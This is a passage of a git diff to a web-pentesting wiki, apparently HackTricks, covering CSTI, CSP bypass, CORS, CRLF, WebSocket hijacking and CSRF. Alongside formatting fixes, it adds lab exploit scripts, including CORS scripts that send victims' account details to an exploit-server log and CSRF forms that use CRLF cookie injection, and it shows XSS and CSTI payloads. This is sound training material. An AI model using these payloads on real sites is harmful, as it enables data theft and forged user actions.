 * ****[**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)****
-* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)****
+* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html)****
diff --git a/pentesting-web/client-side-template-injection-csti.md b/pentesting-web/client-side-template-injection-csti.md
index 1aaffb7b..88bbbed0 100644
--- a/pentesting-web/client-side-template-injection-csti.md
+++ b/pentesting-web/client-side-template-injection-csti.md
@@ -2,16 +2,16 @@
 
 ## Summary
 
-It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you the **execute code** on the remote server, the **CSTI **could allow you to **execute arbitrary JavaScript** code in the victim.
+It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you the **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim.
 
-The way to **test **for this vulnerability is very **similar **as in the case of **SSTI**, the interpreter is going to expect something to execute **between doubles keys** and will execute it. For example using something like: `{{ 7-7 }}` if the server is **vulnerable **you will see a `0` and if not you will see the original: `{{ 7-7 }}`
+The way to **test** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter is going to expect something to execute **between doubles keys** and will execute it. For example using something like: `{{ 7-7 }}` if the server is **vulnerable** you will see a `0` and if not you will see the original: `{{ 7-7 }}`
 
 ## AngularJS
 
 &#x20;AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute (also known as an AngularJS directive). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.\
-For example, if your **input **is being **reflected **inside the **body **of the HTML and the body is defined with `ng-app`:  **`<body ng-app>`**
+For example, if your **input** is being **reflected** inside the **body** of the HTML and the body is defined with `ng-app`:  **`<body ng-app>`**
 
-You can **execute arbitrary JavaScript** code using curly braces **adding **to the **body**: &#x20;
+You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**: &#x20;
 
 ```javascript
 {{$on.constructor('alert(1)')()}}
@@ -58,7 +58,7 @@ Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/resea
 
 Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
 
-**Check more VUE payloads in **[**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)****
+**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)****
 
 ## Mavo
 
@@ -78,7 +78,7 @@ javascript:alert(1)%252f%252f..%252fcss-images
 [self.alert(1)mod1]
 ```
 
-**More payloads in **[**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)****
+**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)****
 
 ## **Brute-Force Detection List**
 
diff --git a/pentesting-web/content-security-policy-csp-bypass.md b/pentesting-web/content-security-policy-csp-bypass.md
index b4d967b2..3e6d7cd9 100644
--- a/pentesting-web/content-security-policy-csp-bypass.md
+++ b/pentesting-web/content-security-policy-csp-bypass.md
@@ -2,7 +2,7 @@
 
 ## What is CSP
 
-Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code  executing functions like `eval`, `setTimeout `or `setInterval:`
+Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code  executing functions like `eval`, `setTimeout` or `setInterval:`
 
 Content Security Policy is implemented via **response headers** or **meta elements of the HTML page**. The browser follows the received policy and actively blocks violations as they are detected.
 
@@ -86,7 +86,7 @@ Working payload: `"/><script>alert(1);</script>`
 Content-Security-Policy: script-src https://google.com 'unsafe-eval'; 
 ```
 
-Working payload:` <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
+Working payload: `<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>`
 
 ### Wildcard
 
@@ -129,11 +129,11 @@ Working payload:&#x20;
 "/>'><script src="/uploads/picture.png.js"></script>
 ```
 
-However, it's highly probable that the server is **validating the uploaded file **and will only allow you to **upload determined type of files**.
+However, it's highly probable that the server is **validating the uploaded file** and will only allow you to **upload determined type of files**.
 
-Moreover, even if you could upload a **JS code inside **a file using a extension accepted by the server (like: _script.png_) this won't be enough because some servers like apache server **selects MIME type of the file based on the extension** and browsers like Chrome will **reject to execute Javascript** code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that **Apache doesn't know **the _**.wave**_ extension, therefore it doesn't serve it with a** MIME type like audio/\***.
+Moreover, even if you could upload a **JS code inside** a file using a extension accepted by the server (like: _script.png_) this won't be enough because some servers like apache server **selects MIME type of the file based on the extension** and browsers like Chrome will **reject to execute Javascript** code inside something that should be an image. "Hopefully", there are mistakes. For example, from a CTF I learnt that **Apache doesn't know** the _**.wave**_ extension, therefore it doesn't serve it with a **MIME type like audio/\***.
 
-From here, if you find a XSS and a file upload, and you manage to find a** misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
+From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)).
 
 ### Third Party Endpoints + 'unsafe-eval'
 
@@ -203,7 +203,7 @@ Depending on the specific policy, the CSP will block JavaScript events. However,
 ?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
 ```
 
-**Find other Angular bypasses in **[**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)****
+**Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)****
 
 ### AngularJS and whitelisted domain
 
@@ -240,14 +240,14 @@ You can bypass this CSP exfiltrating the data via images (in this occasion the X
 
 From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
 
-You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft **an **special image**, **upload **it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract **the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
+You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
 
 ### &#x20;img-src \*; via XSS (iframe) - Time attack
 
 Notice the lack of the directive `'unsafe-inline'`  \
-This time you can make the victim **load **a page in **your control **via **XSS **with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load**  you can extract the information you need.
+This time you can make the victim **load** a page in **your control** via **XSS** with a `<iframe`. This time you are going to make the victim access the page from where you want to extract information (**CSRF**). You cannot access the content of the page, but if somehow you can **control the time the page needs to load**  you can extract the information you need.
 
-This time a **flag **is going to be extracted, whenever a **char is correctly guessed** via SQLi the **response **takes** more time** due to the sleep function. Then, you will be able to extract the flag:
+This time a **flag** is going to be extracted, whenever a **char is correctly guessed** via SQLi the **response** takes **more time** due to the sleep function. Then, you will be able to extract the flag:
 
 ```javascript
 <iframe name=f id=g></iframe> // The bot will load an URL with the payload
@@ -316,7 +316,7 @@ document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = documen
 
 ### Leaking Information CSP + Iframe
 
-Imagine a situation where a **page is redirecting **to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com**  is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\
+Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com**  is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\
 **Also the page redirected isn't allowed by the security policy, but the page that redirects is.**
 
 You can leak the domain where the admin is redirected through:
@@ -336,11 +336,11 @@ Trick from [**here**](https://ctftime.org/writeup/29310).
 
 ## Policy Injection
 
-**Research: **[**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)****
+**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)****
 
 ### Chrome
 
-If a **parameter **sent by you is being **pasted inside **the **declaration **of the **policy, **then you could **alter **the **policy **in some way that makes **it useless**. You could** allow script 'unsafe-inline'** with any of these bypasses:
+If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses:
 
 ```
 script-src-elem *; script-src-attr *
@@ -352,7 +352,7 @@ You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\
 
 ### Edge
 
-In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop **the entire **policy**.\
+In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\
 Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
 
 ## Checking CSP Policies Online
diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md
index 512dbfd0..e585bdf2 100644
--- a/pentesting-web/cors-bypass.md
+++ b/pentesting-web/cors-bypass.md
@@ -60,7 +60,21 @@ xhr.send('<person><name>Arun</name></person>');
 
 ### Pre-flight request
 
-Under certain circumstances, when a cross-domain request includes a **non-standard HTTP method or headers**, the cross-origin request is preceded by a **request** using the **`OPTIONS`** **method**, and the CORS protocol necessitates an initial check on what **methods and headers are permitted prior to allowing the cross-origin request**. This is called the **pre-flight check**. The server **returns a list of allowed methods** in addition to the **trusted origin** and the browser checks to see if the requesting website's method is allowed.
+Under certain circumstances, when a cross-domain request:&#x20;
+
+* includes a **non-standard HTTP method (HEAD, GET, POST)**
+* includes new **headers**
+* includes special **Content-Type header value**
+
+{% hint style="info" %}
+**Check** [**in this link**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests) **the conditions of a request to avoid sending of a pre-flight request**
+{% endhint %}
+
+the cross-origin request is preceded by a **request** using the **`OPTIONS`** **method**, and the CORS protocol necessitates an initial check on what **methods and headers are permitted prior to allowing the cross-origin request**. This is called the **pre-flight check**. The server **returns a list of allowed methods** in addition to the **trusted origin** and the browser checks to see if the requesting website's method is allowed.
+
+{% hint style="danger" %}
+Note that **even if a pre-flight request isn't sent** because the "regular request" conditions are respected, the **response needs to have the authorization headers** or the **browser** **won't be able to read the response** of the request.
+{% endhint %}
 
 For **example**, this is a pre-flight request that is seeking to **use the `PUT` method** together with a **custom** request **header** called `Special-Request-Header`:
 
@@ -97,10 +111,6 @@ Access-Control-Max-Age: 240
 Note that usually (depending on the content-type and headers set) in a **GET/POST request no pre-flight request is sent** (the request is sent **directly**), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.\
 **Therefore, CORS doesn't protect against CSRF (but it can be helpful).**
 
-{% hint style="info" %}
-**Check** [**in this link**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) **the conditions of a request to avoid sending of a pre-flight request**
-{% endhint %}
-
 ## Exploitable misconfigurations
 
 Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself.
@@ -116,13 +126,49 @@ In that case, the **same vulnerability might be exploited.**
 
 In other cases, the developer could check that the **domain** (_victimdomain.com_) **appears** in the **Origin header**, then, an attacker can use a domain called **`attackervictimdomain.com`** to steal the confidential information.
 
+```html
+<script>
+   var req = new XMLHttpRequest();
+   req.onload = reqListener;
+   req.open('get','https://acc21f651fde5631c03665e000d90048.web-security-academy.net/accountDetails',true);
+   req.withCredentials = true;
+   req.send();
+
+   function reqListener() {
+       location='/log?key='+this.responseText;
+   };
+</script>
+```
+
 ### The `null` Origin
 
 `null` is a special value for the **Origin** header. The specification mentions it being triggered by redirects, and local HTML files. Some applications might whitelist the `null` origin to support local development of the application.\
 This is nice because **several application will allow this value** inside the CORS and any **website can easily obtain the null origin using a sandboxed iframe**:
 
-```markup
-<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>
+```html
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
+  var req = new XMLHttpRequest();
+  req.onload = reqListener;
+  req.open('get','https://acd11ffd1e49837fc07b373a00eb0047.web-security-academy.net/accountDetails',true);
+  req.withCredentials = true;
+  req.send();
+  function reqListener() {
+    location='https://exploit-accd1f8d1ef98341c0bc370201c900f2.web-security-academy.net//log?key='+encodeURIComponent(this.responseText);
+  };
+</script>"></iframe>
+```
+
+```html
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
+  var req = new XMLHttpRequest();
+  req.onload = reqListener;
+  req.open('get','https://acd11ffd1e49837fc07b373a00eb0047.web-security-academy.net/accountDetails',true);
+  req.withCredentials = true;
+  req.send();
+  function reqListener() {
+    location='https://exploit-accd1f8d1ef98341c0bc370201c900f2.web-security-academy.net//log?key='+encodeURIComponent(this.responseText);
+  };
+</script>"></iframe>
 ```
 
 ### **Regexp bypasses**
@@ -137,7 +183,7 @@ The `_` character (in subdomains) is not only supported in Safari, but also in C
 
 **Then, using one of those subdomains you could bypass some "common" regexps to find the main domain of a URL.**
 
-**For more information and settings of this bypass check:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **and** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)\*\*\*\*
+**For more information and settings of this bypass check:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **and** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
 
 ![](<../.gitbook/assets/image (153).png>)
 
@@ -161,13 +207,13 @@ Assuming that a user has access to sub.requester.com but not requester.com, and
 
 If the stars are aligned we may be able to use server-side cache poisoning via HTTP header injection to create a [stored XSS](https://portswigger.net/web-security/cross-site-scripting/stored) vulnerability.
 
-If an application **reflects** the **Origin header** without even checking it for illegal characters like **\r**, we effectively have a **HTTP header injection vulnerability against IE/Edge users as Internet Explorer and Edge view \r (0x0d) as a valid HTTP header terminator**:`GET / HTTP/1.1  `\
+If an application **reflects** the **Origin header** without even checking it for illegal characters like **\r**, we effectively have a **HTTP header injection vulnerability against IE/Edge users as Internet Explorer and Edge view \r (0x0d) as a valid HTTP header terminator**:`GET / HTTP/1.1`  \
 `Origin: z[0x0d]Content-Type: text/html; charset=UTF-7`
 
 Internet Explorer sees the response as:
 
-`HTTP/1.1 200 OK  `\
-`Access-Control-Allow-Origin: z  `\
+`HTTP/1.1 200 OK`  \
+`Access-Control-Allow-Origin: z`  \
 `Content-Type: text/html; charset=UTF-7`
 
 This isn't directly exploitable because there's no way for an attacker to make someone's web browser send such a malformed header, but I can **manually craft this request in Burp Suite and a server-side cache may save the response and serve it to other people**. The payload I've used will change the page's character set to **UTF-7**, which is notoriously useful for creating XSS vulnerabilities.
diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md
index e3180ce3..77bf1582 100644
--- a/pentesting-web/crlf-0d-0a.md
+++ b/pentesting-web/crlf-0d-0a.md
@@ -86,7 +86,7 @@ And the server responses with the header:
 Location: http://myweb.com
 ```
 
-**Other example: (from **[**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
+**Other example: (from** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
 
 ```
 http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
@@ -94,7 +94,7 @@ http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHT
 
 #### In URL Path
 
-You can send the payload **inside the URL path** to control the **response **from the server:
+You can send the payload **inside the URL path** to control the **response** from the server:
 
 ```
 http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md
index 52f056f2..f74cb521 100644
--- a/pentesting-web/cross-site-websocket-hijacking-cswsh.md
+++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md
@@ -2,7 +2,7 @@
 
 ## What are WebSockets
 
-WebSocket connections are initiated over **HTTP **and are typically **long-lived**. Messages can be sent in **either direction at any time **and are not transactional in nature. The connection will normally stay open and idle until either the client or the server is ready to send a message.\
+WebSocket connections are initiated over **HTTP** and are typically **long-lived**. Messages can be sent in **either direction at any time** and are not transactional in nature. The connection will normally stay open and idle until either the client or the server is ready to send a message.\
 WebSockets are particularly useful in situations where **low-latency or server-initiated messages** are required, such as real-time feeds of financial data.
 
 ## How are WebSocket connections established?
@@ -14,7 +14,7 @@ WebSocket connections are normally created using client-side JavaScript like the
 var ws = new WebSocket("wss://normal-website.com/chat");
 ```
 
-The **`wss`** protocol establishes a WebSocket over an encrypted **TLS **connection, while the **`ws`** protocol uses an **unencrypted **connection.
+The **`wss`** protocol establishes a WebSocket over an encrypted **TLS** connection, while the **`ws`** protocol uses an **unencrypted** connection.
 
 To establish the connection, the browser and server perform a WebSocket handshake over HTTP. The browser issues a WebSocket handshake request like the following:
 
@@ -41,14 +41,14 @@ At this point, the network connection remains open and can be used to send WebSo
 
 **Note**
 
-Several **features **of the WebSocket **handshake **messages are worth noting:
+Several **features** of the WebSocket **handshake** messages are worth noting:
 
-* The **`Connection`** and **`Upgrade`** headers in the request and response **indicate **that this is a **WebSocket handshake**.
+* The **`Connection`** and **`Upgrade`** headers in the request and response **indicate** that this is a **WebSocket handshake**.
 * The **`Sec-WebSocket-Version`** request header specifies the **WebSocket protocol version** that the client wishes to use. This is typically `13`.
 * The **`Sec-WebSocket-Key`** request header contains a Base64-encoded **random value**, which should be randomly generated in each handshake request.
 * The **`Sec-WebSocket-Accept`** response header contains a hash of the value submitted in the `Sec-WebSocket-Key` request header, concatenated with a specific string defined in the protocol specification. This is done to prevent misleading responses resulting from misconfigured servers or caching proxies.
 
-The **`Sec-WebSocket-Key`** header contains a **random value** to prevent errors from caching proxies, and **is not used for authentication or session handling purposes **(_It's not a CSRF token_).
+The **`Sec-WebSocket-Key`** header contains a **random value** to prevent errors from caching proxies, and **is not used for authentication or session handling purposes** (_It's not a CSRF token_).
 
 ### Linux console
 
@@ -66,7 +66,7 @@ websocat -s 0.0.0.0:8000 #Listen in port 8000
 
 ## MitM websocket connections
 
-If you find that clients are connection to a **HTTP websocket **from your current local network you could try an [ARP Spoofing Attack ](../pentesting/pentesting-network/#arp-spoofing) to perform a MitM attack between the client and the server.\
+If you find that clients are connection to a **HTTP websocket** from your current local network you could try an [ARP Spoofing Attack ](../pentesting/pentesting-network/#arp-spoofing) to perform a MitM attack between the client and the server.\
 Once the client is trying to connect to you you can use:
 
 ```bash
@@ -76,7 +76,7 @@ websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 ## Cross-site WebSocket hijacking (CSWSH)
 
 Also known as _cross-origin WebSocket hijacking_.\
-**It is a **[**Cross-Site Request Forgery (CSRF)**](csrf-cross-site-request-forgery.md)** on a WebSocket handshake.**
+**It is a** [**Cross-Site Request Forgery (CSRF)**](csrf-cross-site-request-forgery.md) **on a WebSocket handshake.**
 
 It arises when the **WebSocket handshake** request relies solely on **HTTP cookies** for session handling and does **not contain any CSRF tokens** or other unpredictable values.\
 An attacker can create a **malicious web page** on their own domain which **establishes a cross-site WebSocket** connection to the vulnerable application. The application will handle the connection in the **context of the victim user's session** with the application.
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index ef2f0178..dd85294c 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -3,7 +3,7 @@
 ## What is CSRF?
 
 **Cross-site request forger**y (also known as CSRF) is a web security vulnerability that allows an attacker to **induce users to perform actions that they do not intend to perform**. \
-This is done by **making a logged in user** in the victim platform access an attacker controlled website and from there **execute **malicious JS code, send forms or retrieve "images" to the** victims account**.
+This is done by **making a logged in user** in the victim platform access an attacker controlled website and from there **execute** malicious JS code, send forms or retrieve "images" to the **victims account**.
 
 ### Requisites
 
@@ -14,7 +14,7 @@ Several **counter-measures** could be in place to avoid this vulnerability.
 ### **Common defenses**
 
 * [**SameSite cookies**](hacking-with-cookies/#samesite): If the session cookie is using this flag, you may not be able to send the cookie from arbitrary web sites.
-* [**Cross-origin resource sharing**](cors-bypass.md): Depending on which kind of HTTP request you need to perform to abuse the relevant action, you may take int account the** CORS policy of the victim site**. _Note that the CORS policy won't affect if you just want to send a GET request or a POST request from a form and you don't need to read the response._
+* [**Cross-origin resource sharing**](cors-bypass.md): Depending on which kind of HTTP request you need to perform to abuse the relevant action, you may take int account the **CORS policy of the victim site**. _Note that the CORS policy won't affect if you just want to send a GET request or a POST request from a form and you don't need to read the response._
 * Ask for the **password** user to authorise the action.
 * Resolve a **captcha**
 * Read the **Referrer** or **Origin** headers. If a regex is used it could be bypassed form example with:
@@ -31,7 +31,7 @@ Several **counter-measures** could be in place to avoid this vulnerability.
 
 ### From POST to GET
 
-Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token but**, you should **check **if a **GET **is also **valid **and if when you send a GET request the **CSRF token is still being validated**.
+Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token but**, you should **check** if a **GET** is also **valid** and if when you send a GET request the **CSRF token is still being validated**.
 
 ### Lack of token
 
@@ -45,8 +45,8 @@ In this situation, the attacker can log in to the application using their own ac
 
 ### Method bypass
 
-If the request is using a "**weird**" **method**, check if the **method** **override functionality **is working.\
-For example, if it's **using a PUT **method you can try to **use a POST **method and **send**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
+If the request is using a "**weird**" **method**, check if the **method** **override functionality** is working.\
+For example, if it's **using a PUT** method you can try to **use a POST** method and **send**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_
 
 This could also works sending the **\_method parameter inside the a POST request** or using the **headers**:
 
@@ -56,20 +56,39 @@ This could also works sending the **\_method parameter inside the a POST request
 
 ### Custom header token bypass
 
-If the request is adding a **custom header** with a **token **to the request as **CSRF protection method**, then:
+If the request is adding a **custom header** with a **token** to the request as **CSRF protection method**, then:
 
 * Test the request without the **Customized Token and also header.**
 * Test the request with exact **same length but different token**.
 
-### CSRF token is tied to a non-session cookie
+### CSRF token is verified by a cookie
 
-Some applications do tie the CSRF token to a cookie, but **not **to the same **cookie **that is used to track **sessions**. This can easily occur when an application employs two different frameworks, one for session handling and one for CSRF protection, which are not integrated together.\
-If the web site contains any **behaviour **that **allows an attacker to set a cookie in a victim's browser**, then an **attack **is possible.
+In a further variation on the preceding vulnerability, some applications  **duplicate each token within a cookie and a request parameter**. Or the **set a csrf cookie** and the **checks in the backend if the csrf token sent is the one related with the cookie**.
 
-### CSRF token is simply duplicated in a cookie
+When the subsequent request is validated, the application simply verifies that the **token** submitted in the **request parameter matches** the value stored by the **cookie**.\
+In this situation, the attacker can again perform a CSRF **attack if the web site contains any vulnerability what would allow him to set his CSRF cookie to the victim like a CRLF**.
 
-In a further variation on the preceding vulnerability, some applications do not maintain any server-side record of tokens that have been issued, but instead **duplicate each token within a cookie and a request parameter**. When the subsequent request is validated, the application simply verifies that the **token **submitted in the **request parameter matches **the value submitted in the **cookie**.\
-In this situation, the attacker can again perform a CSRF** attack if the web site contains any cookie setting functionality**.
+In this case you can set the cookie trying to load a fake image and then launch the CSRF attack like in this example:
+
+```html
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://ac4e1f591f895b02c0ee1ee3001800d4.web-security-academy.net/my-account/change-email" method="POST">
+      <input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
+      <input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <img src="https://ac4e1f591f895b02c0ee1ee3001800d4.web-security-academy.net/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
+  </body>
+</html>
+
+```
+
+{% hint style="info" %}
+Note that if the **csrf token is related with the session cookie this attack won't work** because you will need to set the victim your session, and therefore you will be attacking yourself.
+{% endhint %}
 
 ### Content-Type change
 
@@ -84,7 +103,7 @@ However, note that the **severs logic may vary** depending on the **Content-Type
 ### application/json preflight request bypass
 
 As you already know, you cannot sent a POST request with the Content-Type **`application/json`** via HTML form, and if you try to do so via **`XMLHttpRequest`** a **preflight** request is sent first.\
-However, you could try to send the JSON data using the content types **`text/plain` and `application/x-www-form-urlencoded` **just to check if the backend is using the data independently of the Content-Type.\
+However, you could try to send the JSON data using the content types **`text/plain` and `application/x-www-form-urlencoded` ** just to check if the backend is using the data independently of the Content-Type.\
 You can send a form using `Content-Type: text/plain` setting **`enctype="text/plain"`**
 
 You could also try to **bypass** this restriction by using a **SWF flash file**. More more information [**read this post**](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937).
@@ -115,11 +134,32 @@ https://hahwul.com\.white_domain_com (X)
 https://hahwul.com/.white_domain_com (X)
 ```
 
+To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do:
+
+```html
+<html>
+  <!-- Referrer policy needed to send the qury parameter in the referrer -->
+  <head><meta name="referrer" content="unsafe-url"></head>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
+      <input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      // You need to set this or the domain won't appear in the query of the referer header
+      history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+```
+
 ## **Exploit Examples**
 
 ### **Exfiltrating CSRF Token**
 
-If a **CSRF token** is being used as **defence **you could try to **exfiltrate it **abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
+If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
 
 ### **GET using HTML tags**
 
@@ -497,7 +537,7 @@ with open(PASS_LIST, "r") as f:
         login(USER, line.strip())
 ```
 
-## Tools <a href="tools" id="tools"></a>
+## Tools <a href="#tools" id="tools"></a>
 
 * [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
 
diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md
index 517946d9..6f3c3aaf 100644
--- a/pentesting-web/deserialization/README.md
+++ b/pentesting-web/deserialization/README.md
@@ -7,7 +7,7 @@
 In many occasions you can find some code in the server side that unserialize some object given by the user.\
 In this case, you can send a malicious payload to make the server side behave unexpectedly.
 
